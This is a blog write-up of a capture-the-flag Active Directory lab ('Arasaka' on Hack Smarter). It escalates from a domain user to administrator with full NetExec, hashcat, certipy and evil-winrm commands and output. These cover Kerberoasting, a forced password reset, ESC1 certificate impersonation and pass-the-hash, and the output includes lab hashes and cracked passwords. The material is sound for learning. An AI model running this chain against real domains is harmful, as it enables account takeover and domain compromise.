Post

Arasaka | Hack Smarter

My write-up of the Arasaka Active Directory box on Hack Smarter

Arasaka | Hack Smarter

Foreword

I have only been learning Active Directory for a few weeks now. I was mainly focussed on web and linux stuff before this, and I wanted a bit of a change. If my technique here is dodgy, let me know at jack@dullahan.sh.

Box Description

Starting Credentials

faraday:hacksmarter123

Objective and Scope

You are a member of the Hack Smarter Red Team. This penetration test will operate under an assumed breach scenario, starting with valid credentials for a standard domain user, faraday.

The primary goal is to simulate a realistic attack, identifying and exploiting vulnerabilities to escalate privileges from a standard user to a Domain Administrator.

Enumeration

Rustscan

Since this is a one-machine AD challenge, we can assume the IP we are given is that of the domain controller. We can confirm this with rustscan and also check for any interesting ports like an IIS website.

rustscan -a 10.1.183.116 -- -sVC -Pn

I am using -sVC, a combination of -sV and -sC to enumerate the found services and run nmap’s default scripts against them, and -Pn to treat the server as online since Windows Server doesn’t typically respond to ping.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-07-09 21:34:37Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
3269/tcp  open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: HACKSMARTER
|   NetBIOS_Domain_Name: HACKSMARTER
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hacksmarter.local
|   DNS_Computer_Name: DC01.hacksmarter.local
|   DNS_Tree_Name: hacksmarter.local
|   Product_Version: 10.0.20348
|_  System_Time: 2026-07-09T21:35:26+00:00
5985/tcp  open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
57040/tcp open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
57041/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
57053/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
57067/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
57085/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
59925/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

There’s nothing particularly interesting here, just the standard Domain Controller ports. The script scanning has told us that the servers hostname is DC01.hacksmarter.local. Since there is no website, we will move on to testing the credentials we have been given.

Enumerating the Domain as Faraday

Generating Hosts File

Using netexec, we can generate our hosts file using nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --generate-hosts-file hosts.txt.

Enumerating Shares

The first thing I like to do when I gain valid domain credentials is check what shares the user has access to using NetExec.

1
2
3
4
5
6
7
8
9
10
11
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --shares
SMB         10.1.183.116    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.183.116    445    DC01             [+] hacksmarter.local\faraday:hacksmarter123
SMB         10.1.183.116    445    DC01             [*] Enumerated shares
SMB         10.1.183.116    445    DC01             Share           Permissions     Remark
SMB         10.1.183.116    445    DC01             -----           -----------     ------
SMB         10.1.183.116    445    DC01             ADMIN$                          Remote Admin
SMB         10.1.183.116    445    DC01             C$                              Default share
SMB         10.1.183.116    445    DC01             IPC$            READ            Remote IPC
SMB         10.1.183.116    445    DC01             NETLOGON        READ            Logon server share
SMB         10.1.183.116    445    DC01             SYSVOL          READ            Logon server share

Faraday can read the IPC$ directory, meaning we could perform RID brute-forcing to obtain a list of users. However, we can most likely just use --users to do so. Otherwise, there are no interesting shares present.

Enumerating Users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --users-export users.txt
SMB         10.1.183.116    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.183.116    445    DC01             [+] hacksmarter.local\faraday:hacksmarter123
SMB         10.1.183.116    445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.1.183.116    445    DC01             Administrator                 2025-09-18 22:40:20 0       Built-in account for administering the computer/domain
SMB         10.1.183.116    445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.1.183.116    445    DC01             krbtgt                        2025-09-21 02:51:44 0       Key Distribution Center Service Account
SMB         10.1.183.116    445    DC01             Goro                          2025-09-21 15:00:31 0       Loyal to a fault
SMB         10.1.183.116    445    DC01             alt.svc                       2025-09-21 15:07:42 0       Trapped for eternity
SMB         10.1.183.116    445    DC01             Yorinobu                      2025-09-21 15:12:44 0
SMB         10.1.183.116    445    DC01             Hanako                        2025-09-21 14:59:03 0       Waiting at embers
SMB         10.1.183.116    445    DC01             Faraday                       2025-09-21 15:06:45 0
SMB         10.1.183.116    445    DC01             Smasher                       2025-09-21 15:01:20 0
SMB         10.1.183.116    445    DC01             Soulkiller.svc                2025-09-21 15:30:13 0       Certificate managment for soulkiller AI
SMB         10.1.183.116    445    DC01             Hellman                       2025-09-21 15:04:19 0
SMB         10.1.183.116    445    DC01             kei.svc                       2025-09-21 15:05:16 0       Trapped for eternity
SMB         10.1.183.116    445    DC01             Silverhand.svc                2025-09-21 15:03:10 0       Trapped for eternity
SMB         10.1.183.116    445    DC01             Oda                           2025-09-21 15:02:14 0
SMB         10.1.183.116    445    DC01             the_emperor                   2025-11-06 17:19:03 0
SMB         10.1.183.116    445    DC01             [*] Enumerated 15 local users: HACKSMARTER
SMB         10.1.183.116    445    DC01             [*] Writing 15 local users to users.txt

There are a few users, including a few service accounts which might be vulnerable to Kerberoasting. I have exported them to users.txt.

Collecting Bloodhound Data

1
2
3
4
5
6
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --bloodhound --collection All --dns-server 10.1.183.116
LDAP        10.1.183.116    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP        10.1.183.116    389    DC01             [+] hacksmarter.local\faraday:hacksmarter123
LDAP        10.1.183.116    389    DC01             Resolved collection methods: trusts, psremote, group, container, session, rdp, localadmin, acl, dcom, objectprops
LDAP        10.1.183.116    389    DC01             Done in 0M 19S
LDAP        10.1.183.116    389    DC01             Compressing output into /root/.nxc/logs/DC01_10.1.183.116_2026-07-09_225010_bloodhound.zip

Reviewing Bloodhound Data

Looking at the Bloodhound data, our user has no interesting groups or outbound object controls, so I want to move on to checking for Kerberoastable service accounts.

Kerberoasting

1
2
3
4
5
6
7
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --kerberoasting kerberoast.txt
LDAP        10.1.183.116    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP        10.1.183.116    389    DC01             [+] hacksmarter.local\faraday:hacksmarter123
LDAP        10.1.183.116    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.1.183.116    389    DC01             [*] Total of records returned 1
LDAP        10.1.183.116    389    DC01             [*] sAMAccountName: alt.svc, memberOf: [], pwdLastSet: 2025-09-21 16:07:42.894050, lastLogon: <never>
LDAP        10.1.183.116    389    DC01             $krb5tgs$23$*alt.svc$HACKSMARTER.LOCAL$hacksmarter.local\alt.svc*$dffb3a824d51c5773780390479d5d2f5$c033c03a72506dcff08556c290389fcb23e73d91f70c11c57170d884d8f555d7352b04df0441e188b5a463cfefd4f11ccb7f45d7044eaedfb952319d1ad6d0d64c30d575c19b8246131fd554ac402c45bdb2629d3cebbf2da0e44367cd75dfc7efe477800ccf7d081ce2c2a2348e99154d6599099a6c9cbc44e472feb610eb4ec8b8b84fc45a32d7c9ccd6ef7c9612ce6073a229d797b328b61b0457777e8f6115ef9d4b8e34b054227c3dabcc626df9e753b63d69136568c9d542aa2b704bd759d0bb43fe2d65c4bc35d9f9cfda33802c7d2e91ab52d759d4913e08302d519d62354365de07d1b4d5f41e005d3580c1691173626ae7b79e746f113551e3fdfc46a8f69dc9a916dfb66cdfd20a7fb31db41ddeb9a7731ff1ee5cf179a71957190cafc90904fd896b2c4541c71f0386086e44fb6220957d572c8a60417282ef3596fac6007e1ca9dd859733da54141730950c833bba468f2695a1b74c92861c5af652c0edaba22ecbd5ee1e386b503107b1607738f5a85b2c066e8b71f83c8e901d708547fcc1ed54309ff9658ca0842ef36d96ee905f2261ad00ddf8f368f0f4bbab6316e801e73110921471e3deb389bad991ce4a92ee427ce5a4651379ddd4f4446f6908649ee878149b6f327ddebc13abcae12bf5d6444840f1af1f2839c42ff8193d715bdd084934f27a7df80646df753985ed71cce34ca92b7f5d6da1250dd6ad05e9d9aa4b5bb6cc3da6bd7daea5f259865bcef666dc9e8b8f8f26225da2c1cc768e81b5cfbf2bb0e2d827d52a6ebbd0cae821fc606a90c39d008d6d71b17f4db1c6a48584f3dd0ba04fb4928fe70834f11f30f845e17e9ea2b0f488e03fdb53cdf5c8fdf6884c492dbf93044b5fff0e1d1fd276655b5e0224e0895dc7ea978c051b7801a942b77ca4f2b570477d55868e67115c9ac52b7e77675e76151ac87b69111c49248d76328d77062b5b4d30c2d28297f00f82b5b6aed2555a86dd06d339eec85a3e73df04444ed14ea53faf012ce5de65592bacfbd881478900783edf3bb82e13ead8b79e16bfae5d5dadd0f028b9dd8624fc0392034f404ab0fba257561cc46555817c819c3cc814d09bc3cd23a80fa76618cd0cb5d7a7a8ac4de7c0175fae9cda6c7e3147a8e1849bb74712d767cf971e8b11ef8097f630e8df0ef6ac9b1c7ac16c20bf203548374f41c613407795108fb598da9c6b10e107bd18607e101e3f0d65343f90aa43e7ffcbecc84d1b2b5eae5ef11e80594ed19710f60c1ba1203b083438f2c9207884b7dabb65a804674669f17bbfe05466c4bccf73450b3e89fa69560a2dfe6d2618201637357deb582a5fb60f9de3ab4eda7a143060ba0adca6fe1496476d56e5a35dde6eba7aaa6f89eea2c259cc91e1c2e70706fcd908e335424813284655497128bac6e91a9d7e564254d2e532037bb1f05a59ba53832aadf1606d9c9cebebca87c21127c3e0fb12a700446805747463c9c2fdcd810fa8670f4a74bc8b557c413a01a969b3cdca4921cc

The alt.svc user is vulnerable to kerberoasting, and we were able to capture their hash for offline cracking.

hashcat kerberoast.txt /usr/share/wordlists/rockyou.txt

Cracking the alt.svc user, we find their credetials to be alt.svc:babygirl1.

Reviewing Permissions of alt.svc

Bloodhound screenshot showing GenericAll over Yorinobu We have GenericAll over Yorinobu

Looking at Bloodhound’s outbound object control section, we have GenericAll over the Yorinobu user, meaning we can change their password with NetExec.

1
2
3
4
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'alt.svc' -p 'babygirl1' -M change-password -o USER=yorinobu NEWPASS=password
SMB         10.1.183.116    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.1.183.116    445    DC01             [+] hacksmarter.local\alt.svc:babygirl1
CHANGE-P... 10.1.183.116    445    DC01             [+] Successfully changed password for yorinobu

Reviewing Permissions of Yorinobu

Yorinobu has a very wide set of permissions. He is part of the remote management group and has GenericWrite over soulkiller.svc, allowing for either targeted kerberoasting or a shadow credentials attack.

Bloodhound screenshot showing Yorinobu's groups. Yorinobu’s Groups

Bloodhound screenshot showing Yorinobu having GenericWrite over soulkiller.svc Yorinobu has GenericWrite over soulkiller.svc

Targeted Kerberoasting

Using NetExec, we can perform targeted kerberoasting against soulkiller to obtain their blob.

1
2
3
4
5
6
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'yorinobu' -p 'password' --kerberoasting targeted-kerberoast.txt --targeted-kerberoast soulkiller.svc
LDAP        10.1.183.116    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP        10.1.183.116    389    DC01             [+] hacksmarter.local\yorinobu:password
LDAP        10.1.183.116    389    DC01             [+] Found 1 enabled users without SPN.
LDAP        10.1.183.116    389    DC01             [*] sAMAccountName: Soulkiller.svc, memberOf: [], pwdLastSet: 2025-09-21 16:30:13.900225, lastLogon: <never>
LDAP        10.1.183.116    389    DC01             $krb5tgs$23$*Soulkiller.svc$HACKSMARTER.LOCAL$hacksmarter.local\Soulkiller.svc*$0543f0fdef5059859fc7d5a32dd1f1d0$5b9b211791645919f5033e36a2b1b968715446ba9e0667d4d8b61d83b62d1977ec0ef4fa34cb08e83f892c652d8bdf3c1ce641f9a5a6d99beec15c6160166f309c160a7fab43282f7138298ad168d3e8e5a1eb08cbcb6bdf4495613404b4f00d5a430455b2279c7588ce75d1b734415dfc9d0dad370c1ffdf47965cfa0d60bb2bb8daccd4b382ffd4af92e58c9e8024bef309efdfec7cf493a8ce639f8c20c232f713ea36ec082c2f4bfa05ac2fde68518f64a599fbaac4a254ff91b83aa8c6e56131f22b75c9dff4486e3217989cc971005f554ee8ce90266ae0a9b7732f5f1ee8c7f6ec49c84ac794688360ed7b0b2c2884453ea3ffad27662f8bf52fa8d1beec266697b3a7aa89a5755d320e41afebe05291aa5e3ae95583b9c17bdf106e312440f3e8d02be04dba93a7985c64466a0f49e719d6b09ffc0a4121898f131c2bf768a6391cf28347702c22fdd35b7a37e074d8c33ae22c79e8e1ee73aa38b74855a5e204cc5982cafe79336da0ebad65de3b4a7e3673a725397c07952860a4481cde2433e20c3acaeb9db29dd0c12ceecaafd430c1f93445d9f482e5bfa2317d23f5111da8fac0e4a34d0a5212f8b58294647f42cc3653544cac730ca0d0e0002053b152cefe4b3f98b12ff3054f98c0ea9093e446ccb022fff6572913b85f17032c11a9585e62bb959b153fdf10decc0d58fc9b9445887fcd5b2bbe3d844be2e337a1c7bbf49b89ac16f96c440bfd621cf663fe36e3d36830993cf01d42ad6af0da7ade97b7c4181422c025c64ff193ebf4935df245c96308e2a2c5627c8b1c59b8b93efe45c202da4c72ce44aabb88fc2493135d1ccf2b110407753ff53e82cb2bad818988ba3386ab2938245a6ecb5ca056bd04108746ff48de95814c0fc5c1cbee291a3f00603452ff85b947490848b0f199297395fc670b5f0668bed9c8060dbb512dd3b478f593b9cecd8a8728976833ef7f5f0674563b9c852130d82e7f59f32ce4a6ddceed66f0c7ca98e835d27304d4e94ef39eb542090544f7cc6c4e4b6454d400cfe9ce2cbd1f61c6dcdbc0af653999aaeb66aa27ff1d2ad2379460f9db18c11b59a53a5ef5edebbd7c5ba906068b5c4dbc72be4fb8439f3cf29cfe8a24b07a05b7039fee9249aa3602f1db50b8fee598af8404eb57b2feffbc64fad645418431e9b81c819e05aa6d71f33f5303e57714d6529039cc0c666e5b97fbd19377c96d81982da8a1a66eb1558649d0a0e33611cac6508322fd0b87ae3dc058edb2a29a0de69202daa5ca0bd87e71e5607f5de05855aaa0698dd42ad6b905d9d3c1a2ce32ba3573d11a11fe212d2416226089a2c5c96ac1764651f057084b4f75546b5a07bb592b0d2c09c96ce2a255fb02bb7048e9be8cc58486f0cf339611f13b0c79a9a092e8f0802b98ed8f18960310a2581ab423b3e6dcca382973d6252e4a64e26990df5f82d1bfa4072b32a52fd403e248ae64d86b71355ba6fe2ade0038ed7bd455db77e5b49073168f2883decfd366cd276ede4960a49d3fcefe43339e82b892ec6486bcc5edc6f5fd03b

As before we can crack with hashcat targeted-kerberoast.txt /usr/share/wordlists/rockyou.txt. We find their credentials to be soulkiller.svc:MYpassword123#.

Where to Next?

Now we have soulkiller’s account, we’ve hit a dead end on Bloodhound. As soon as bloodhound shows a dead end, I like to check for misconfigured certificates with certipy to see if we can escalate our privileges.

Checking for Vulnerable Certificates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
exegol-arasaka Arasaka # certipy find -u "soulkiller.svc" -p 'MYpassword123#' -dc-ip "10.1.183.116" -vulnerable -text
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'hacksmarter-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'hacksmarter-DC01-CA'
[*] Checking web enrollment for CA 'hacksmarter-DC01-CA' @ 'DC01.hacksmarter.local'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260709232857_Certipy.txt'
[*] Wrote text output to '20260709232857_Certipy.txt'

Reviewing the certificates, we can see that AI_Takeover is vulnerable to ESC1. This allows us to impersonate any user, including and admin. This is game over for the Domain Controller if it can be exploited.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Certificate Templates
  0
    Template Name                       : AI_Takeover
    Display Name                        : AI_Takeover
    Certificate Authorities             : hacksmarter-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-21T16:16:36+00:00
    Template Last Modified              : 2025-09-21T16:16:36+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HACKSMARTER.LOCAL\Soulkiller.svc
                                          HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : HACKSMARTER.LOCAL\Administrator
        Full Control Principals         : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
        Write Owner Principals          : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
        Write Dacl Principals           : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
        Write Property Enroll           : HACKSMARTER.LOCAL\Domain Admins
                                          HACKSMARTER.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : HACKSMARTER.LOCAL\Soulkiller.svc
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.

Exploiting ESC1

Again using certipy, we can exploit the ESC1 vulnerability to obtain the The Emperor’s certificate, and then we can pass the certificate to obtain The Emperor’s NT hash.

1
2
3
4
5
6
7
8
9
10
exegol-arasaka Arasaka # certipy req -u 'soulkiller.svc@hacksmarter.local' -p 'MYpassword123#' -dc-ip '10.1.183.116' -target 'hacksmarter.local' -ca 'hacksmarter-DC01-CA' -template 'AI_Takeover' -upn 'the_emperor@hacksmarter.local' -sid 'S-1-5-21-3154413470-3340737026-2748725799-1601'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with UPN 'the_emperor@hacksmarter.local'
[*] Certificate object SID is 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*] Saving certificate and private key to 'the_emperor.pfx'
[*] Wrote certificate and private key to 'the_emperor.pfx'

We can then authenticate to obtain the NT hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
certipy auth -pfx the_emperor.pfx -dc-ip '10.1.183.116'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'the_emperor@hacksmarter.local'
[*]     SAN URL SID: 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*]     Security Extension SID: 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*] Using principal: 'the_emperor@hacksmarter.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'the_emperor.ccache'
[*] Wrote credential cache to 'the_emperor.ccache'
[*] Trying to retrieve NT hash for 'the_emperor'
[*] Got hash for 'the_emperor@hacksmarter.local': aad3b435b51404eeaad3b435b51404ee:d87640b0d83dc7f90f5f30bd6789b133

Shell as The Emperor

We now have The Emperor’s NT hash, meaning we can use EvilWinRM to authenticate to the Domain Controller and obtain the root flag.

1
2
3
4
5
6
7
8
9
10
exegol-arasaka Arasaka # evil-winrm-py --ip "10.1.183.116" --user "the_emperor" --hash "d87640b0d83dc7f90f5f30bd6789b133"
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to '10.1.183.116:5985' as 'the_emperor'
evil-winrm-py PS C:\Users\the_emperor\Documents> type C:\Users\Administrator\Desktop\root.txt
fcf1dd0f08d1068a2f151fd2ec5ecf05

Final Notes

This is my first proper write-up, and one of the first Active Directory machines I completed myself. I hope to write more in the future. Thanks for reading.

This post is licensed under CC BY 4.0 by the author.